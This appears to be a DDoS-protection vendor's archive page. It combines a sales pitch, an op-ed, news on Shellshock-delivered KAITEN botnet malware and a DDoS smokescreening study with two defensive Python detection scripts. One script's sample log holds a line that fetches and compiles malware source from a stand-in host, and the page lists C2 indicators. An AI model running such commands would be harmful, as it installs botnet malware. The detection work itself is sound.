DDoS Protection Specialist Archive

As the Director of Sales for DOSarrest Internet Security I have the opportunity to speak with many prospects looking for DDoS protection service for their corporate website.

What I have learned is that there are many competitors offering what I would call a “bare bones vanilla offering”.

Some offer anything from a free service to services priced at $200 – $300/month. These plans offer only very basic protection. They also advertise an Enterprise offering whose starting price can turn into quite a large expense depending on your circumstances.

The Enterprise service is the offering that any company serious about protecting its website should consider. There are a few issues with each of these offerings that I’d like to point out.

These competitors claim to have a very large number of clients using their services but fail to mention that 80–85% of them are on the free service. Roughly 10–15% of their customers are on the $200–$300/month service, which again is really just basic protection with limited capabilities.

When a company experiences a large attack, which is completely out of its control, it is told it should upgrade to the Enterprise offering. I hear from prospects quite often that this $200 – $300/month service offers neither adequate protection nor adequate customer support.

In most cases there is no phone support included at all! They also charge the client based on the size of the attack. How can a client control the size of an attack they are experiencing? This uncertainty makes it virtually impossible for a company to budget costs. Let’s not be mistaken: their goal is to get you onto their Enterprise offering, which will cost you in excess of a thousand dollars per month.

By contrast, at DOSarrest Internet Security we offer a single Enterprise-level service to all of our clients.

The service includes full telephone and email access to our 24/7 support team, giving you direct access to system experts. Given the criticality of the service, we do not operate a tiered support model.

We also protect our clients from all DDoS attacks regardless of size, with no additional charges based on the size of an attack.

We also include an external monitoring account with our service, called DEMS (DOSarrest External Monitoring Service). This allows our 24/7 support team to monitor your website from 8 sensors in 4 geographical regions.

We proactively inform our clients if we notice any issues with their website. Most of our competitors do not offer this service, and those that do don’t include it free of charge.

DOSarrest has been providing DDoS protection services since 2007. We were one of the very first DDoS protection providers globally and have successfully mitigated thousands of real-world attacks. This is not an “add-on product” for us. Our team has the experience, and protecting a client’s website is our #1 priority. Please visit our newly revamped website and take a look at the testimonials page to see what some of our current customers are saying about their experience with us.

Please feel free to reach out to me directly or anyone on our sales team at sales@dosarrest.com for further information on our service.

Brian Mohammed

Director of Sales for DOSarrest Internet Security LTD.

When you start with the premise that capitalism is illegitimate it’s easy to dismiss other people’s property rights.

To some people, a political mission matters more than anything, including your rights. Such people (the Bolsheviks come to mind) have caused a great deal of damage and suffering throughout history, especially in the last 100 years or so. Now they’re taking their mission online. You better not get in their way.

Molly Sauter, a doctoral student at McGill University and a research affiliate at the Berkman Center at Harvard (“exploring cyberspace, sharing its study & pioneering its development”), has a paper calling the use of DDOS (distributed denial of service) attacks a legitimate form of activism and protest. This can’t go unchallenged.

Sauter notes the severe penalties for DDOS attacks under “…Title 18, Section 1030 (a)(5) of the US Code, otherwise known as the CFAA” (Computer Fraud and Abuse Act). This section is short enough that I may as well quote it here verbatim:

(5)(A) [Whoever] knowingly causes the transmission of a program, information, code, or command, and as a result of such conduct, intentionally causes damage without authorization, to a protected computer;
(B) intentionally accesses a protected computer without authorization, and as a result of such conduct, recklessly causes damage; or
(C) intentionally accesses a protected computer without authorization, and as a result of such conduct, causes damage and loss.

There are other problems with the CFAA with respect to some legitimate security research and whether it technically falls afoul of the act, but that’s not the issue here.

Sauter goes on in some detail with the penalties under Federal law for violating this act and, no argument here, they are extreme and excessive. You can easily end up with many years in prison. This is, in fact, a problem generally true of Federal law, the number of crimes under which has grown insanely in the last 30 or so years, with the penalties growing proportionately. For an informed and intelligent rant on the problem I recommend Three Felonies a Day by Harvey Silverglate. Back to hacktivist DDOS attacks.

She cites cases of DDOS attacks committed against Koch Industries, Paypal, the Church of Scientology and Lufthansa Airlines, some of these by the hacktivists who call themselves Anonymous. In the US cases of the attacks against Koch, Paypal and the Church, the attackers received prison time and large fines and restitution payments. In the Lufthansa case, in a German court, the attacker was sentenced to pay a fine or serve 90 days in jail; that sentence was overturned on appeal. The court ruled that “…the online demonstration did not constitute a show of force but was intended to influence public opinion.”

This is the sort of progressive opinion, dismissive of property rights, that Sauter regrets is not happening here in the US. She notes, and this makes sense to me, that the draconian penalties in the CFAA induce guilty pleas from defendants, preventing the opportunity for a Lufthansa-like precedent.

This is part and parcel of the same outrageous growth of Federal criminal law I mentioned earlier; you’ll find the same incentive to plead guilty, even if you’re just flat-out innocent, all over the US Code. I would join Sauter in calling for some sanity in the sentencing in the CFAA, but I part ways with her argument that political motives are a mitigating, even excusing factor.

Sauter’s logic rises from a foundation of anti-capitalism:

…it would appear that the online space is being or has already been abdicated to a capitalist-commercial governance structure, which happily merges the interests of corporate capitalism with those of the post-9/11 security state while eliding democratic values of political participation and protest, all in the name of ‘stability.’

Once you determine that capitalism is illegitimate, respect for other people’s property rights is no longer a problem. Fortunately, the law protects people against the likes of Anonymous and other anti-capitalist heroes of the far left.

I would not have known or cared about Sauter’s article had it not been for a favorable link to it by Bruce Schneier. Schneier is a Fellow at the Berkman Center.

Progressives and other leftists who think DDOS, i.e. impeding the business of a person or entity with whom you disagree in order to make a political point, should consider the shoe on the other foot. If I disagree with Schneier’s positions is it cool for me to crash his web site or those of other organizations with which he is affiliated, such as the Berkman Center, the New America Foundation’s Open Technology Institute, the Electronic Frontier Foundation, the Electronic Privacy Information Center and BT (formerly British Telecom)? I could apply the same principle to anti-abortion protesters impeding access to a clinic. I’m disappointed with Schneier for implying with his link that it’s legitimate to engage in DDOS attacks for political purposes.

It’s worth repeating that Sauter has a point about the CFAA, particularly with respect to the sentences. It does need to be reformed — along with a large chunk of other Federal law. The point of these laws is supposed to be to protect people against the offenses of others, not to protect the offender.

Source: http://www.zdnet.com/researcher-makes-the-case-for-ddos-attacks-7000034560/

Attackers have been leveraging Shellshock vulnerabilities to deliver malware since the issue was disclosed in late September, and now researchers with Trend Micro have observed a Bash bug payload – detected as TROJ_BASHKAI.SM – downloading the source code of KAITEN malware.

KAITEN is an older Internet Relay Chat (IRC)-controlled malware that is typically used to carry out distributed denial-of-service (DDoS) attacks, so spreading the infection can help the attackers bring down targeted organizations, according to a Sunday Trend Micro post.

“The purpose is to add compromised systems to botnets,” Christopher Budd, global threat communications manager with Trend Micro, told SCMagazine.com in a Monday email correspondence. “In this case these are botnets primarily focused on launching DDoS attacks.”

Getting KAITEN on the system – Linux/UNIX and Mac OS X systems are at risk, Budd said – is not a direct process.

TROJ_BASHKAI.SM connects to two URLs when executed, according to the post. The first URL downloads the KAITEN source code, which is compiled using the gcc compiler and ultimately builds an executable file detected as ELF_KAITEN.SM.

Compiling ensures proper execution of the malware because, if downloaded directly as an executable, the file runs the risk of having compatibility issues with different Linux OS distributions, the post indicates. Furthermore, the file will evade network security systems that only scan for executables.

ELF_KAITEN.SM connects to an IRC server at x[dot]secureshellz[dot]net, joins IRC channel #pwn, and awaits commands, according to the post. The commands include performing a UDP flood, performing a SYN flood, downloading files, sending raw IRC commands, starting a remote shell, performing a PUSH-ACK flood, and disabling, enabling or terminating the client.

When TROJ_BASHKAI.SM connects to the second URL, KAITEN source code is downloaded and similarly compiled into ELF_KAITEN.A, which is essentially the same as ELF_KAITEN.SM except that it connects to linksys[dot]secureshellz[dot]net[colon]25 and to channel #shellshock, the post indicates.
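The infection chain described above leaves two observable traces on a defender's side: a web-facing service account spawning a compiler (the payload arrives as source and is built with gcc on the victim), and outbound IRC traffic to the secureshellz[.]net hosts or a JOIN to the #pwn / #shellshock channels. The following is an added triage example, not code from Trend Micro or SC Magazine; the telemetry line format, the list of web service accounts, the download IP (a documentation address) and the rule names are all constructed for this example, while the domain, port and channel indicators come from the article.

```python
"""Defender-side triage for the Shellshock -> KAITEN chain described in the article.

Two signals are checked over host and network telemetry:
  1. a web service account (www-data, apache, ...) spawning a compiler, and
  2. outbound connections to *.secureshellz.net, or an IRC JOIN to #pwn or #shellshock.
The line format below is constructed for this example; map your own EDR / NetFlow /
IDS fields onto the same dict keys.
"""
import re

# Indicators quoted in the article (C2 domain suffix, channels).
C2_DOMAIN_SUFFIX = "secureshellz.net"
C2_CHANNELS = {"#pwn", "#shellshock"}

# Assumption of this example: accounts a web server runs as, and compiler names.
WEB_SERVICE_USERS = {"www-data", "apache", "nginx", "httpd", "_www"}
COMPILERS = {"gcc", "cc", "g++", "make"}

# Constructed sample telemetry. Each line: <epoch> <kind> key=value ...
SAMPLE_LOG = """\
1412800001 proc user=www-data ppid=1122 pid=2201 exe=/bin/bash cmd="bash -c wget http://198.51.100.7/ka.c"
1412800002 proc user=www-data ppid=2201 pid=2202 exe=/usr/bin/gcc cmd="gcc ka.c -o .x"
1412800003 proc user=alice ppid=3000 pid=3001 exe=/usr/bin/gcc cmd="gcc hello.c -o hello"
1412800004 net src=10.0.0.5 dst=x.secureshellz.net dport=6667 proto=tcp
1412800005 irc src=10.0.0.5 dst=linksys.secureshellz.net dport=25 msg="JOIN #shellshock"
1412800006 net src=10.0.0.9 dst=mirror.example.org dport=443 proto=tcp
"""

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_line(line):
    """Parse one constructed telemetry line into a dict with ts, kind and key=value fields."""
    ts, kind, rest = line.split(" ", 2)
    fields = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
    return {"ts": int(ts), "kind": kind, **fields}


def scan_events(events):
    """Return (ts, rule, detail) findings matching the KAITEN infection chain."""
    findings = []
    for ev in events:
        if ev["kind"] == "proc":
            exe = ev["exe"].rsplit("/", 1)[-1]
            if ev["user"] in WEB_SERVICE_USERS and exe in COMPILERS:
                findings.append((ev["ts"], "compiler-under-web-account", ev["cmd"]))
        elif ev["kind"] in ("net", "irc"):
            host = ev["dst"].lower()
            # Exact match or a subdomain; "secureshellz.net.example.com" must not match.
            if host == C2_DOMAIN_SUFFIX or host.endswith("." + C2_DOMAIN_SUFFIX):
                findings.append((ev["ts"], "kaiten-c2-host",
                                 f"{ev['src']} -> {host}:{ev['dport']}"))
            m = re.match(r"JOIN\s+(\S+)", ev.get("msg", ""))
            if m and m.group(1).lower() in C2_CHANNELS:
                findings.append((ev["ts"], "kaiten-c2-channel", m.group(1)))
    return findings


def scan_log(text):
    """Parse a whole constructed log and scan it."""
    return scan_events(parse_line(l) for l in text.splitlines() if l.strip())


if __name__ == "__main__":
    for ts, rule, detail in scan_log(SAMPLE_LOG):
        print(ts, rule, detail)
```

The compiler rule is the more durable of the two: the C2 hostnames can change with each campaign, but a build toolchain running under the web server's account is unusual in production and survives a change of infrastructure. The suffix check is written so that a look-alike domain that merely contains the indicator does not fire.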

Source: http://www.scmagazine.com/bash-bug-payload-downloads-kaiten-malware/article/375650/

The editorial board of the Russia Today TV channel has reported the most powerful DDoS attack ever mounted on its website. The information was published on the website itself.

“Today the RT.com website was subjected to the most powerful DDoS attack in the channel’s entire existence. The UDP flood DDoS attack on the RT site reached 10 Gbit/s. Thanks to the site’s reliable technical protection, RT.com was unavailable for just a few minutes, although the DDoS attack continued,” the statement said.

So far no one has claimed responsibility for the attack.

The RT.com website has been subjected to DDoS attacks repeatedly. One of the most powerful attacks occurred on February 18, 2013; the English-language RT site was only restored 6 hours after the attack began. In August 2012 the sites of the RT channels in English and Spanish were also attacked. Responsibility for that attack was claimed by the hacker group AntiLeaks, which opposes Julian Assange’s WikiLeaks project.

Source: http://newstwenty4seven.com/en/news/russia-today-zajavil-o-moschnejshej-ddos-atake-na-svoj-sajt

New study warns of rising smokescreening practice in cyberattacks

The top takeaway of a new study suggests that more and more frequently, distributed denial of service (DDoS) attacks are being used as a smokescreen, distracting organizations while malware or viruses are injected to steal money, data, or intellectual property.

The white paper, the 2014 Neustar Annual DDoS Attacks and Impact Report: A Neustar High-Tech Brief, reveals insights into this trend based on a survey of 440 North American companies, comparing DDoS findings from 2013 to 2012.

Over the last year, the study found, DDoS attacks evolved in strategy and tactics. More than half of attacked companies also reported theft of funds, data, or intellectual property. These cyber-attacks are intense but quick, more surgical in nature than sustained strikes whose goal is to extend downtime.

This year’s survey also demonstrated that the landscape of DDoS attacks is changing. The number of attacks is up, but attack duration is down, meaning that attacks are becoming more intense and harder to catch. Larger attacks are more common, but most attacks still are less than 1 Gbps. Although companies report a greater financial risk during a DDoS outage, most still rely on traditional defenses like firewall, rather than purpose-built solutions like DDoS mitigation hardware or cloud services.

Among the study’s other findings:

  • Virus and malware insertion during DDoS attacks was common: 47 percent of companies that experienced a DDoS attack and a data breach simultaneously reported the installation of a virus or malware.
  • The industry sees DDoS as a growing threat, with 91 percent of high-tech respondents viewing DDoS as a similar or larger threat than just a year ago.
  • 87 percent of companies attacked were hit multiple times.
  • Nearly twice as many businesses were hit: in 2013, 60 percent of companies were DDoS-attacked, up from 35 percent in 2012.  And these attacks were of shorter duration in 2013.
  • Attacks between 1 and 5 Gbps almost tripled.
  • Customer support is the leading area of impact. For 53 percent of tech companies that suffered an outage, customer service was cited as the area most affected, while 47 percent named brand/customer confidence as the most affected.
  • Collectively, non-IT/security groups see the greatest cost increases in the event of a DDoS attack.
  • High-tech revenue losses are in line with those of other sectors. In 2013, DDoS was just as risky for high-tech as for other verticals, with 47 percent reporting revenue risks of more than $50 K per hour and 31 percent hourly risks of more than $100 K. That means that daily revenue risks are often measured in seven figures.

The conclusion of the report is that there is a trend towards shorter DDoS attacks, but also more attacks from 1 to 5 Gbps — quicker, more concentrated strikes, that suggest a growing presence of a highly damaging tactic called DDoS smokescreening.

Smokescreening distracts IT and security teams with a DDoS attack, allowing criminals to grab and clone private data to siphon off funds, intellectual property, and other information.  In one case, thieves used DDoS to steal bank customers’ credentials and drain $9 million from ATMs in just 48 hours. Such crimes have caused the FDIC to warn about DDoS as a diversionary tactic.

The study urges businesses to watch for the warning signs, including shorter, more intense attacks with no extortion or policy demands.  It also counsels them to follow best practices such as not assigning all resources to DDoS mitigation but dedicating some staff to monitoring entry systems during attacks, making sure everything is patched with up-to-date security fixes, and establishing dedicated DDoS protection.
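The advice to keep some staff watching entry systems during an attack can be partly mechanised: take the DDoS alert windows from the mitigation service and list the sensitive entry events that occurred inside them and look unusual for the account involved. The following is an added example written for this page, not code from Neustar or the report; the DDoS windows, the entry-system log, its schema (timestamp, user, action, source network, amount), the privileged-action list and the transfer threshold are all constructed assumptions.

```python
"""Correlate DDoS alert windows with entry-system activity (smokescreening check).

Events inside an attack window are flagged when the account appears from a
source network never seen before the attack, performs a privileged action,
or moves a large amount. Data and schema are constructed for this example.
"""
from datetime import datetime, timedelta

# Constructed DDoS alert windows (start, end) as a mitigation service would report them.
DDOS_WINDOWS = [
    (datetime(2014, 4, 2, 13, 0), datetime(2014, 4, 2, 13, 25)),  # 25-minute UDP flood
]

# Constructed entry-system log: (timestamp, user, action, source network, amount).
ENTRY_LOG = [
    (datetime(2014, 4, 1, 9, 5),   "jdoe", "login",     "203.0.113.0/24",  0),
    (datetime(2014, 4, 1, 9, 7),   "jdoe", "transfer",  "203.0.113.0/24",  1200),
    (datetime(2014, 4, 1, 10, 0),  "ops",  "login",     "198.51.100.0/24", 0),
    (datetime(2014, 4, 2, 13, 4),  "jdoe", "login",     "192.0.2.0/24",    0),      # new network, in window
    (datetime(2014, 4, 2, 13, 6),  "jdoe", "transfer",  "192.0.2.0/24",    48000),  # large, in window
    (datetime(2014, 4, 2, 13, 10), "ops",  "login",     "198.51.100.0/24", 0),      # usual network, in window
    (datetime(2014, 4, 2, 13, 12), "ops",  "add_admin", "198.51.100.0/24", 0),      # privileged, in window
    (datetime(2014, 4, 2, 14, 0),  "jdoe", "login",     "192.0.2.0/24",    0),      # after window
]

# Assumptions: which actions count as privileged, and what "large" means for this business.
PRIVILEGED_ACTIONS = {"add_admin", "change_payee", "reset_mfa"}
LARGE_TRANSFER = 10000


def in_window(ts, windows, slack=timedelta(minutes=10)):
    """True if ts falls inside any attack window, widened by `slack` on both sides."""
    return any(start - slack <= ts <= end + slack for start, end in windows)


def baseline_networks(log, before):
    """Source networks each user was seen from before `before` (the pre-attack baseline)."""
    seen = {}
    for ts, user, _action, net, _amount in log:
        if ts < before:
            seen.setdefault(user, set()).add(net)
    return seen


def smokescreen_suspects(log, windows):
    """Return (ts, user, action, reasons) for in-window entry events worth a human look."""
    if not windows:
        return []
    baseline = baseline_networks(log, min(start for start, _end in windows))
    suspects = []
    for ts, user, action, net, amount in log:
        if not in_window(ts, windows):
            continue
        reasons = []
        if net not in baseline.get(user, set()):
            reasons.append("new source network during attack")
        if action in PRIVILEGED_ACTIONS:
            reasons.append("privileged action during attack")
        if action == "transfer" and amount >= LARGE_TRANSFER:
            reasons.append("large transfer during attack")
        if reasons:
            suspects.append((ts, user, action, "; ".join(reasons)))
    return suspects


if __name__ == "__main__":
    for ts, user, action, reasons in smokescreen_suspects(ENTRY_LOG, DDOS_WINDOWS):
        print(ts.isoformat(), user, action, "->", reasons)
```

The baseline is built only from events before the first attack window, so a network the attacker keeps using after the flood stops does not quietly become "normal"; the slack around each window covers the minutes before mitigation reports the attack and after it ends, which is exactly when the report says the quick, surgical strikes happen.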

Rodney Joffe, Neustar senior VP and senior technologist notes, “The stakes are much higher. If you’re a criminal, why mess around with extortion when you can just go ahead and steal — and on a much greater scale?”

Source: http://www.bsminfo.com/doc/smokescreening-is-the-latest-danger-in-ddos-attacks-0001